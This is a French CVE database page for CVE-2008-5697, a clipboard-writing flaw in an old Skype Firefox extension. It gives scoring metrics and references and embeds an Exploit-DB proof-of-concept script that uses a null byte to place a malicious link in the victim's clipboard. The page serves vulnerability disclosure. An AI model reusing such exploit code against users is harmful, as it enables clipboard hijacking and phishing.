CVE-2008-5697 : Détail

CVE-2008-5697

1.78%V3
Network
2008-12-22
14h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The skype_tool.copy_num method in the Skype extension BETA 2.2.0.95 for Firefox allows remote attackers to write arbitrary data to the clipboard via a string argument.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:P/I:N/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 6690

Date de publication : 2008-10-06 22h00 +00:00
Auteur : irk4z
EDB Vérifié : Yes

<!--------------------------------------------------------------------------- Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability PoC download: https://developer.skype.com/SkypeToolbars Author: irk4z[at]yahoo.pl homepage: http://irk4z.wordpress.com/ greets: all friends ----------------------------------------------------------------------------> <a href="#" onclick="check_it();" >test it!</a> <script type="text/javascript"> function copy_to_clipboard( text ){ if (skype_tool) { var copy_it = text + '\0+'; //use null byte to copy value, because '+' char must be in string skype_tool.copy_num( copy_it ); } } function check_it(){ //copy_to_clipboard('malicious text!!!!!!!!!!!\n\n\n!!'); //copy_to_clipboard('http://irk4z.wordpress.com/'); copy_to_clipboard('http://malicious.link.to.bad.page/'); alert('Done! Check your clipboard!'); } </script> # milw0rm.com [2008-10-07]

Products Mentioned

Configuraton 0

Skype>>Skype_extension_for_firefox >> Version 2.2.0.95

    Mozilla>>Firefox >> Version *

    Références

    https://www.exploit-db.com/exploits/6690
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://securityreason.com/securityalert/4797
    Tags : third-party-advisory, x_refsource_SREASON
    http://www.securityfocus.com/bid/31613
    Tags : vdb-entry, x_refsource_BID